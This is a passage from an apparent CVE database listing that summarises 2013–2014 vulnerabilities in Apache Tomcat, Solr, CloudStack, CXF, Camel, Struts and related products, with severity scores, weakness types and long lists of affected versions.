apache tomcat 5.5.12
apache tomcat 4.1.28
apache tomcat 4.1.10
apache tomcat 5.0.12
apache tomcat 4.1.31
apache tomcat 5.0.3
apache tomcat 5.0.8
apache tomcat 5.0.30
apache tomcat 5.0.21
apache tomcat 3.2.3
apache tomcat *
apache tomcat 5.0.9
apache tomcat 5.0.29
apache tomcat 5.0.25
apache tomcat 5.0.10
apache tomcat 5.0.15
apache tomcat 4.0.2
apache tomcat 4.0.6
apache tomcat 5.5.10
apache tomcat 5.0.6
apache tomcat 5.5.4
apache tomcat 5.5.20
apache tomcat 4.1.9
apache tomcat 5.5.2
apache tomcat 3.2.2
apache tomcat 4.1.0
apache tomcat 5.0.11
apache tomcat 3.1
apache tomcat 5.5.19
apache tomcat 3.2.4
apache tomcat 5.0.18
apache tomcat 5.0.4
apache tomcat 4.1.3
apache tomcat 5.0.1
CVE-2013-6397 MEDIUM

Directory traversal vulnerability in SolrResourceLoader in Apache Solr before 4.6 allows remote attackers to read arbitrary files via a .. (dot dot) or full pathname in the tr parameter to solr/select/, when the response writer (wt parameter) is set to XSLT. NOTE: this can be leveraged using a separate XXE (XML eXternal Entity) vulnerability to allow access to files across restricted network boundaries.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache solr 4.2.0
apache solr 4.5.0
apache solr 4.2.1
apache solr 4.1.0
apache solr 4.4.0
apache solr *
apache solr 4.0.0
apache solr 4.3.0
apache solr 4.3.1
CVE-2013-6398 LOW

The virtual router in Apache CloudStack before 4.2.1 does not preserve the source restrictions in firewall rules after being restarted, which allows remote attackers to bypass intended restrictions via a request.

CVSS 2.0

Severity: LOW

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache cloudstack 2.1.5
apache cloudstack 4.0.0
apache cloudstack 4.0.2
apache cloudstack 2.0.1
apache cloudstack 2.1.10
apache cloudstack 4.1.0
apache cloudstack 2.2.0
apache cloudstack 2.2.2
apache cloudstack 2.2.5
apache cloudstack 2.2.14
apache cloudstack *
apache cloudstack 2.1.7
apache cloudstack 2.2.1
apache cloudstack 2.2.7
apache cloudstack 2.1.9
apache cloudstack 4.1.1
apache cloudstack 2.2.6
apache cloudstack 2.2.9
apache cloudstack 2.1.6
apache cloudstack 2.1.0
apache cloudstack 3.0.2
apache cloudstack 3.0.1
apache cloudstack 2.1.8
apache cloudstack 2.1.4
apache cloudstack 3.0.0
apache cloudstack 2.1.3
apache cloudstack 2.2.12
apache cloudstack 2.2.8
apache cloudstack 2.1.2
apache cloudstack 2.1.1
apache cloudstack 2.2.3
apache cloudstack 2.0
apache cloudstack 4.0.1
apache cloudstack 2.2.11
apache cloudstack 2.2.13
CVE-2013-6407 MEDIUM

The UpdateRequestHandler for XML in Apache Solr before 4.1 allows remote attackers to have an unspecified impact via XML data containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache solr *
apache solr 3.6.1
apache solr 4.0.0
apache solr 3.6.0
apache solr 3.6.2
CVE-2013-6408 MEDIUM

The DocumentAnalysisRequestHandler in Apache Solr before 4.3.1 does not properly use the EmptyEntityResolver, which allows remote attackers to have an unspecified impact via XML data containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue. NOTE: this vulnerability exists because of an incomplete fix for CVE-2013-6407.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache solr 4.2.0
apache solr 4.2.1
apache solr 4.1.0
apache solr *
apache solr 3.6.1
apache solr 4.0.0
apache solr 3.6.0
apache solr 3.6.2
CVE-2013-6438 MEDIUM

The dav_xml_get_cdata function in main/util.c in the mod_dav module in the Apache HTTP Server before 2.4.8 does not properly remove whitespace characters from CDATA sections, which allows remote attackers to cause a denial of service (daemon crash) via a crafted DAV WRITE request.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server *
canonical ubuntu_linux 12.04
canonical ubuntu_linux 10.04
canonical ubuntu_linux 12.10
canonical ubuntu_linux 13.10
oracle http_server 11.1.1.7.0
oracle http_server 12.1.3.0
oracle http_server 10.1.3.5.0
oracle http_server 12.1.2.0
CVE-2013-6480 LOW

Libcloud 0.12.3 through 0.13.2 does not set the scrub_data parameter for the destroy DigitalOcean API, which allows local users to obtain sensitive information by leveraging a new VM.

CVSS 2.0

Severity: LOW

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache libcloud 0.13.2
apache libcloud 0.12.3
apache libcloud 0.12.4
apache libcloud 0.13.0
apache libcloud 0.13.1
CVE-2013-7285 HIGH

XStream API versions up to 1.4.6 and version 1.4.10, if the security framework has not been initialized, may allow a remote attacker to run arbitrary shell commands by manipulating the processed input stream when unmarshaling XML or any supported format, e.g. JSON.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-78,

Products Affected

Vendor Product Version
xstream_project xstream *
xstream_project xstream 1.4.10
apache activemq 5.15.8
oracle endeca_information_discovery_studio 3.2.0
CVE-2013-7372 MEDIUM

The engineNextBytes function in classlib/modules/security/src/main/java/common/org/apache/harmony/security/provider/crypto/SHA1PRNG_SecureRandomImpl.java in the SecureRandom implementation in Apache Harmony through 6.0M3, as used in the Java Cryptography Architecture (JCA) in Android before 4.4 and other products, when no seed is provided by the user, uses an incorrect offset value, which makes it easier for attackers to defeat cryptographic protection mechanisms by leveraging the resulting PRNG predictability, as exploited in the wild against Bitcoin wallet applications in August 2013.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-310,

Products Affected

Vendor Product Version
google android 4.1
apache harmony *
google android 4.0.3
google android 4.2.1
google android *
google android 4.0
google android 4.0.1
google android 4.2
google android 4.0.2
google android 4.2.2
google android 4.1.2
google android 4.0.4
google android 4.3
CVE-2013-7393 LOW

The daemonize.py module in Subversion 1.8.0 before 1.8.2 allows local users to gain privileges via a symlink attack on the pid file created for (1) svnwcsub.py or (2) irkerbridge.py when the --pidfile option is used. NOTE: this issue was SPLIT from CVE-2013-4262 based on different affected versions (ADT3).

CVSS 2.0

Severity: LOW

Problem Type: CWE-59,

Products Affected

Vendor Product Version
apache subversion 1.8.0
apache subversion 1.8.1
CVE-2014-0002 HIGH

The XSLT component in Apache Camel before 2.11.4 and 2.12.x before 2.12.3 allows remote attackers to read arbitrary files and possibly have other unspecified impact via an XML document containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache camel 1.6.2
apache camel 2.10.7
apache camel 1.6.0
apache camel 1.5.0
apache camel 1.3.0
apache camel 2.10.1
apache camel 2.10.4
apache camel 2.11.2
apache camel *
apache camel 1.6.1
apache camel 2.0.0
apache camel 2.10.5
apache camel 2.11.0
apache camel 2.12.2
apache camel 2.12.0
apache camel 2.10.3
apache camel 2.12.1
apache camel 1.0.0
apache camel 2.1.0
apache camel 1.4.0
apache camel 1.1.0
apache camel 2.11.1
apache camel 2.10.0
apache camel 1.2.0
apache camel 2.10.2
apache camel 1.6.4
apache camel 2.10.6
apache camel 1.6.3
CVE-2014-0003 HIGH

The XSLT component in Apache Camel 2.11.x before 2.11.4, 2.12.x before 2.12.3, and possibly earlier versions allows remote attackers to execute arbitrary Java methods via a crafted message.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache camel 1.6.2
apache camel 2.10.7
apache camel 1.6.0
apache camel 1.5.0
apache camel 1.3.0
apache camel 2.10.1
apache camel 2.10.4
apache camel 2.11.2
apache camel *
apache camel 1.6.1
apache camel 2.0.0
apache camel 2.10.5
apache camel 2.11.0
apache camel 2.12.2
apache camel 2.12.0
apache camel 2.10.3
apache camel 2.12.1
apache camel 1.0.0
apache camel 2.1.0
apache camel 1.4.0
apache camel 1.1.0
apache camel 2.11.1
apache camel 2.10.0
apache camel 1.2.0
apache camel 2.10.2
apache camel 1.6.4
apache camel 2.10.6
apache camel 1.6.3
CVE-2014-0030 HIGH

The XML-RPC protocol support in Apache Roller before 5.0.3 allows attackers to conduct XML External Entity (XXE) attacks via unspecified vectors.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache roller 3.1
apache roller 5.0.1
apache roller 4.0.1
apache roller 5.0
apache roller 5.0.2
apache roller 4.0
CVE-2014-0031 MEDIUM

The (1) ListNetworkACL and (2) listNetworkACLLists APIs in Apache CloudStack before 4.2.1 allow remote authenticated users to list network ACLS for other users via a crafted request.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache cloudstack 2.1.5
apache cloudstack 4.0.0
apache cloudstack 4.0.2
apache cloudstack 2.0.1
apache cloudstack 2.1.10
apache cloudstack 4.1.0
apache cloudstack 2.2.0
apache cloudstack 2.2.2
apache cloudstack 2.2.5
apache cloudstack 2.2.14
apache cloudstack *
apache cloudstack 2.1.7
apache cloudstack 2.2.1
apache cloudstack 2.2.7
apache cloudstack 2.1.9
apache cloudstack 4.1.1
apache cloudstack 2.2.6
apache cloudstack 2.2.9
apache cloudstack 2.1.6
apache cloudstack 2.1.0
apache cloudstack 3.0.2
apache cloudstack 3.0.1
apache cloudstack 2.1.8
apache cloudstack 2.1.4
apache cloudstack 3.0.0
apache cloudstack 2.1.3
apache cloudstack 2.2.12
apache cloudstack 2.2.8
apache cloudstack 2.1.2
apache cloudstack 2.1.1
apache cloudstack 2.2.3
apache cloudstack 2.0
apache cloudstack 4.0.1
apache cloudstack 2.2.11
apache cloudstack 2.2.13
CVE-2014-0032 MEDIUM

The get_resource function in repos.c in the mod_dav_svn module in Apache Subversion before 1.7.15 and 1.8.x before 1.8.6, when SVNListParentPath is enabled, allows remote attackers to cause a denial of service (crash) via vectors related to the server root and request methods other than GET, as demonstrated by the "svn ls http://svn.example.com" command.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache subversion 1.7.3
apache subversion 1.7.1
apache subversion 1.8.5
apache subversion 1.8.2
apache subversion *
apache subversion 1.8.3
apache subversion 1.8.4
apache subversion 1.8.0
apache subversion 1.7.8
apache subversion 1.7.10
apache subversion 1.7.5
apache subversion 1.8.1
apache subversion 1.7.11
apache subversion 1.7.12
apache subversion 1.7.0
apache subversion 1.7.2
apache subversion 1.7.6
apache subversion 1.7.9
apache subversion 1.7.13
apache subversion 1.7.4
apache subversion 1.7.7
CVE-2014-0033 MEDIUM

org/apache/catalina/connector/CoyoteAdapter.java in Apache Tomcat 6.0.33 through 6.0.37 does not consider the disableURLRewriting setting when handling a session ID in a URL, which allows remote attackers to conduct session fixation attacks via a crafted URL.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache tomcat 6.0.33
apache tomcat 6.0.36
apache tomcat 6.0.34
apache tomcat 6.0.35
apache tomcat 6.0.37
CVE-2014-0034 MEDIUM

The SecurityTokenService (STS) in Apache CXF before 2.6.12 and 2.7.x before 2.7.9 does not properly validate SAML tokens when caching is enabled, which allows remote attackers to gain access via an invalid SAML token.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache cxf 2.7.0
apache cxf 2.6.3
redhat jboss_enterprise_application_platform 6.0.0
redhat jboss_enterprise_application_platform 6.2.0
apache cxf 2.6.6
apache cxf 2.6.0
apache cxf 2.6.10
apache cxf 2.6.4
apache cxf 2.6.7
apache cxf 2.7.4
apache cxf 2.6.5
apache cxf 2.6.1
apache cxf 2.7.5
apache cxf 2.7.7
apache cxf 2.6.9
apache cxf 2.7.1
apache cxf *
apache cxf 2.6.8
apache cxf 2.6.2
apache cxf 2.7.3
apache cxf 2.7.2
apache cxf 2.7.6
apache cxf 2.7.8
CVE-2014-0035 MEDIUM

The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-310,

Products Affected

Vendor Product Version
apache cxf 2.7.0
apache cxf 2.6.3
redhat jboss_enterprise_application_platform 6.0.0
apache cxf 2.6.6
apache cxf 2.6.0
apache cxf 2.6.10
apache cxf 2.7.4
apache cxf 2.7.9
apache cxf 2.7.5
apache cxf 2.7.7
apache cxf 2.6.9
apache cxf 2.6.8
apache cxf 2.7.3
apache cxf 2.7.2
apache cxf 2.6.11
redhat jboss_enterprise_application_platform 6.2.0
apache cxf 2.6.4
apache cxf 2.6.7
apache cxf 2.6.5
apache cxf 2.6.1
apache cxf 2.7.1
apache cxf *
apache cxf 2.6.2
apache cxf 2.7.6
apache cxf 2.7.8
CVE-2014-0043 MEDIUM

In Apache Wicket 1.5.10 or 6.13.0, by issuing requests to special URLs handled by Wicket, it is possible to check for the existence of particular classes in the classpath and thus check whether a third-party library with a known security vulnerability is in use.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache wicket 6.13.0
apache wicket 1.5.10
CVE-2014-0048 HIGH

An issue was found in Docker before 1.6.0. Some programs and scripts in Docker are downloaded via HTTP and then executed or used in unsafe ways.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache geode 1.12.0
docker docker *
CVE-2014-0050 HIGH

MultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop's intended exit conditions.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache tomcat 7.0.47
apache tomcat 8.0.0
oracle retail_applications 13.0
apache tomcat 7.0.13
apache tomcat 7.0.39
apache commons_fileupload 1.2
apache tomcat 7.0.44
apache commons_fileupload 1.1.1
apache tomcat 7.0.12
oracle retail_applications 12.0in
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 7.0.28
apache tomcat 7.0.21
apache tomcat 7.0.33
apache tomcat 7.0.31
oracle retail_applications 13.1
apache tomcat 7.0.3
apache tomcat 7.0.40
apache tomcat 7.0.17
apache tomcat 7.0.11
apache tomcat 7.0.16
apache commons_fileupload 1.0
apache commons_fileupload 1.2.2
oracle retail_applications 13.2
apache tomcat 7.0.5
apache tomcat 7.0.0
apache tomcat 7.0.32
oracle retail_applications 14.0
apache tomcat 7.0.4
apache tomcat 7.0.25
apache tomcat 7.0.36
oracle retail_applications 13.3
apache tomcat 7.0.38
apache tomcat 7.0.15
apache tomcat 7.0.37
apache tomcat 7.0.48
apache tomcat 7.0.42
apache tomcat 7.0.35
apache tomcat 7.0.23
apache tomcat 7.0.9
apache tomcat 7.0.19
apache tomcat 7.0.43
oracle retail_applications 12.0
apache tomcat 7.0.18
apache tomcat 7.0.46
apache tomcat 7.0.7
apache tomcat 7.0.29
apache commons_fileupload 1.2.1
apache tomcat 7.0.34
apache tomcat 7.0.24
apache tomcat 7.0.20
apache tomcat 7.0.14
apache tomcat 7.0.49
apache commons_fileupload 1.1
oracle retail_applications 13.4
apache tomcat 8.0.1
apache tomcat 7.0.1
apache tomcat 7.0.45
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 7.0.26
apache tomcat 7.0.8
apache tomcat 7.0.27
apache tomcat 7.0.2
apache commons_fileupload *
apache tomcat 7.0.22
apache tomcat 7.0.30
CVE-2014-0072 MEDIUM

ios/CDVFileTransfer.m in the Apache Cordova File-Transfer standalone plugin (org.apache.cordova.file-transfer) before 0.4.2 for iOS and the File-Transfer plugin for iOS from Cordova 2.4.0 through 2.9.0 might allow remote attackers to spoof SSL servers by leveraging a default value of true for the trustAllHosts option.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache cordova_file_transfer *
apache cordova *
CVE-2014-0073 HIGH

The CDVInAppBrowser class in the Apache Cordova In-App-Browser standalone plugin (org.apache.cordova.inappbrowser) before 0.3.2 for iOS and the In-App-Browser plugin for iOS from Cordova 2.6.0 through 2.9.0 does not properly validate callback identifiers, which allows remote attackers to execute arbitrary JavaScript in the host page and consequently gain privileges via a crafted gap-iab: URI.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache cordova_in-app-browser *
apache cordova *
CVE-2014-0074 HIGH

Apache Shiro 1.x before 1.2.3, when using an LDAP server with unauthenticated bind enabled, allows remote attackers to bypass authentication via an empty (1) username or (2) password.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache shiro 1.2.2
apache shiro 1.1.0
apache shiro 1.2.0
apache shiro 1.2.1
apache shiro 1.0.0
CVE-2014-0075 MEDIUM

Integer overflow in the parseChunkHeader function in java/org/apache/coyote/http11/filters/ChunkedInputFilter.java in Apache Tomcat before 6.0.40, 7.x before 7.0.53, and 8.x before 8.0.4 allows remote attackers to cause a denial of service (resource consumption) via a malformed chunk size in chunked transfer coding of a request during the streaming of data.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-189,

Products Affected

Vendor Product Version
apache tomcat 7.0.47
apache tomcat 8.0.0
apache tomcat 7.0.13
apache tomcat 7.0.39
apache tomcat 6.0
apache tomcat 6.0.7
apache tomcat 7.0.44
apache tomcat 6.0.1
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 8.0.3
apache tomcat 6.0.8
apache tomcat 6.0.29
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 6.0.12
apache tomcat 6.0.37
apache tomcat 7.0.28
apache tomcat 7.0.21
apache tomcat 7.0.33
apache tomcat 7.0.31
apache tomcat 6.0.36
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 6.0.32
apache tomcat 7.0.40
apache tomcat 6.0.4
apache tomcat 6.0.2
apache tomcat 7.0.17
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 7.0.0
apache tomcat 6.0.17
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 6.0.28
apache tomcat 7.0.25
apache tomcat 7.0.36
apache tomcat 6.0.33
apache tomcat 7.0.38
apache tomcat 7.0.15
apache tomcat 7.0.37
apache tomcat 7.0.48
apache tomcat 7.0.42
apache tomcat 7.0.35
apache tomcat 6.0.13
apache tomcat 7.0.23
apache tomcat *
apache tomcat 7.0.9
apache tomcat 7.0.19
apache tomcat 7.0.43
apache tomcat 7.0.18
apache tomcat 7.0.46
apache tomcat 7.0.7
apache tomcat 7.0.29
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 7.0.34
apache tomcat 7.0.24
apache tomcat 6.0.31
apache tomcat 7.0.20
apache tomcat 6.0.20
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 7.0.49
apache tomcat 6.0.30
apache tomcat 8.0.1
apache tomcat 6
apache tomcat 7.0.1
apache tomcat 7.0.45
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 7.0.26
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 7.0.8
apache tomcat 7.0.27
apache tomcat 6.0.11
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 7.0.52
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 7.0.22
apache tomcat 6.0.3
apache tomcat 7.0.30
apache tomcat 6.0.14
apache tomcat 6.0.35
CVE-2014-0094 MEDIUM

The ParametersInterceptor in Apache Struts before 2.3.16.2 allows remote attackers to "manipulate" the ClassLoader via the class parameter, which is passed to the getClass method.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache struts *
CVE-2014-0095 MEDIUM

java/org/apache/coyote/ajp/AbstractAjpProcessor.java in Apache Tomcat 8.x before 8.0.4 allows remote attackers to cause a denial of service (thread consumption) by using a "Content-Length: 0" AJP request to trigger a hang in request processing.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache tomcat 8.0.0
apache tomcat 8.0.1
apache tomcat 8.0.3
CVE-2014-0096 MEDIUM

java/org/apache/catalina/servlets/DefaultServlet.java in the default servlet in Apache Tomcat before 6.0.40, 7.x before 7.0.53, and 8.x before 8.0.4 does not properly restrict XSLT stylesheets, which allows remote attackers to bypass security-manager restrictions and read arbitrary files via a crafted web application that provides an XML external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache tomcat 7.0.47
apache tomcat 8.0.0
apache tomcat 7.0.13
apache tomcat 7.0.39
apache tomcat 6.0
apache tomcat 6.0.7
apache tomcat 7.0.44
apache tomcat 6.0.1
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 8.0.3
apache tomcat 6.0.8
apache tomcat 6.0.29
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 6.0.12
apache tomcat 6.0.37
apache tomcat 7.0.28
apache tomcat 7.0.21
apache tomcat 7.0.33
apache tomcat 7.0.31
apache tomcat 6.0.36
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 6.0.32
apache tomcat 7.0.40
apache tomcat 6.0.4
apache tomcat 6.0.2
apache tomcat 7.0.17
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 7.0.0
apache tomcat 6.0.17
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 6.0.28
apache tomcat 7.0.25
apache tomcat 7.0.36
apache tomcat 6.0.33
apache tomcat 7.0.38
apache tomcat 7.0.15
apache tomcat 7.0.37
apache tomcat 7.0.48
apache tomcat 7.0.42
apache tomcat 7.0.35
apache tomcat 6.0.13
apache tomcat 7.0.23
apache tomcat *
apache tomcat 7.0.9
apache tomcat 7.0.19
apache tomcat 7.0.43
apache tomcat 7.0.18
apache tomcat 7.0.46
apache tomcat 7.0.7
apache tomcat 7.0.29
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 7.0.34
apache tomcat 7.0.24
apache tomcat 6.0.31
apache tomcat 7.0.20
apache tomcat 6.0.20
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 7.0.49
apache tomcat 6.0.30
apache tomcat 8.0.1
apache tomcat 6
apache tomcat 7.0.1
apache tomcat 7.0.45
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 7.0.26
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 7.0.8
apache tomcat 7.0.27
apache tomcat 6.0.11
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 7.0.52
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 7.0.22
apache tomcat 6.0.3
apache tomcat 7.0.30
apache tomcat 6.0.14
apache tomcat 6.0.35
CVE-2014-0098 MEDIUM

The log_cookie function in mod_log_config.c in the mod_log_config module in the Apache HTTP Server before 2.4.8 allows remote attackers to cause a denial of service (segmentation fault and daemon crash) via a crafted cookie that is not properly handled during truncation.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server *
oracle secure_global_desktop 4.71
oracle secure_global_desktop 5.0
canonical ubuntu_linux 10.04
oracle http_server 11.1.1.7.0
oracle http_server 12.1.3.0
canonical ubuntu_linux 12.04
oracle secure_global_desktop 4.63
canonical ubuntu_linux 12.10
canonical ubuntu_linux 13.10
oracle http_server 10.1.3.5.0
oracle secure_global_desktop 5.1
oracle http_server 12.1.2.0
CVE-2014-0099 MEDIUM

Integer overflow in java/org/apache/tomcat/util/buf/Ascii.java in Apache Tomcat before 6.0.40, 7.x before 7.0.53, and 8.x before 8.0.4, when operated behind a reverse proxy, allows remote attackers to conduct HTTP request smuggling attacks via a crafted Content-Length HTTP header.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-189,

Products Affected

Vendor Product Version
apache tomcat 7.0.47
apache tomcat 8.0.0
apache tomcat 7.0.13
apache tomcat 7.0.39
apache tomcat 6.0
apache tomcat 6.0.7
apache tomcat 7.0.44
apache tomcat 6.0.1
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 8.0.3
apache tomcat 6.0.8
apache tomcat 6.0.29
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 6.0.12
apache tomcat 6.0.37
apache tomcat 7.0.28
apache tomcat 7.0.21
apache tomcat 7.0.33
apache tomcat 7.0.31
apache tomcat 6.0.36
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 6.0.32
apache tomcat 7.0.40
apache tomcat 6.0.4
apache tomcat 6.0.2
apache tomcat 7.0.17
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 7.0.0
apache tomcat 6.0.17
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 6.0.28
apache tomcat 7.0.25
apache tomcat 7.0.36
apache tomcat 6.0.33
apache tomcat 7.0.38
apache tomcat 7.0.15
apache tomcat 7.0.37
apache tomcat 7.0.48
apache tomcat 7.0.42
apache tomcat 7.0.35
apache tomcat 6.0.13
apache tomcat 7.0.23
apache tomcat *
apache tomcat 7.0.9
apache tomcat 7.0.19
apache tomcat 7.0.43
apache tomcat 7.0.18
apache tomcat 7.0.46
apache tomcat 7.0.7
apache tomcat 7.0.29
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 7.0.34
apache tomcat 7.0.24
apache tomcat 6.0.31
apache tomcat 7.0.20
apache tomcat 6.0.20
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 7.0.49
apache tomcat 6.0.30
apache tomcat 8.0.1
apache tomcat 6
apache tomcat 7.0.1
apache tomcat 7.0.45
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 7.0.26
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 7.0.8
apache tomcat 7.0.27
apache tomcat 6.0.11
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 7.0.52
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 7.0.22
apache tomcat 6.0.3
apache tomcat 7.0.30
apache tomcat 6.0.14
apache tomcat 6.0.35
CVE-2014-0107 HIGH

The TransformerFactory in Apache Xalan-Java before 2.7.2 does not properly restrict access to certain properties when FEATURE_SECURE_PROCESSING is enabled, which allows remote attackers to bypass expected restrictions and load arbitrary classes or access external resources via a crafted (1) xalan:content-header, (2) xalan:entities, (3) xslt:content-header, or (4) xslt:entities property, or a Java property that is bound to the XSLT 1.0 system-property function.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache xalan-java 2.4.0
apache xalan-java 2.5.2
apache xalan-java 2.6.0
oracle webcenter_sites 11.1.1.8.0
apache xalan-java 1.0.0
apache xalan-java 2.2.0
apache xalan-java 2.1.0
apache xalan-java 2.0.1
apache xalan-java 2.4.1
oracle webcenter_sites 7.6.2
apache xalan-java 2.5.0
apache xalan-java 2.5.1
apache xalan-java 2.0.0
apache xalan-java *
apache xalan-java 2.7.0
CVE-2014-0109 MEDIUM

Apache CXF before 2.6.14 and 2.7.x before 2.7.11 allows remote attackers to cause a denial of service (memory consumption) via a large request with the Content-Type set to text/html to a SOAP endpoint, which triggers an error.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache cxf 2.7.0
apache cxf 2.4.4
apache cxf 2.5.8
apache cxf 2.6.3
apache cxf 2.6.6
apache cxf 2.6.0
apache cxf 2.6.10
apache cxf 2.7.4
apache cxf 2.7.9
apache cxf 2.7.5
apache cxf 2.7.7
apache cxf 2.6.9
apache cxf 2.5.9
apache cxf 2.6.8
apache cxf 2.4.0
apache cxf 2.5.2
apache cxf 2.7.10
apache cxf 2.7.3
apache cxf 2.4.6
apache cxf 2.7.2
apache cxf 2.6.11
apache cxf 2.4.5
apache cxf 2.6.4
apache cxf 2.6.7
apache cxf 2.5.0
apache cxf 2.5.5
apache cxf 2.6.12
apache cxf 2.5.6
apache cxf 2.6.5
apache cxf 2.5.3
apache cxf 2.4.7
apache cxf 2.6.1
apache cxf 2.4.1
apache cxf 2.4.3
apache cxf 2.7.1
apache cxf *
apache cxf 2.5.1
apache cxf 2.5.4
apache cxf 2.6.2
apache cxf 2.5.7
apache cxf 2.4.2
apache cxf 2.7.6
apache cxf 2.7.8
CVE-2014-0110 MEDIUM

Apache CXF before 2.6.14 and 2.7.x before 2.7.11 allows remote attackers to cause a denial of service (/tmp disk consumption) via a large invalid SOAP message.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache cxf 2.7.0
apache cxf 2.4.4
apache cxf 2.5.8
apache cxf 2.6.3
apache cxf 2.6.6
apache cxf 2.6.0
apache cxf 2.6.10
apache cxf 2.7.4
apache cxf 2.7.9
apache cxf 2.7.5
apache cxf 2.7.7
apache cxf 2.6.9
apache cxf 2.5.9
apache cxf 2.6.8
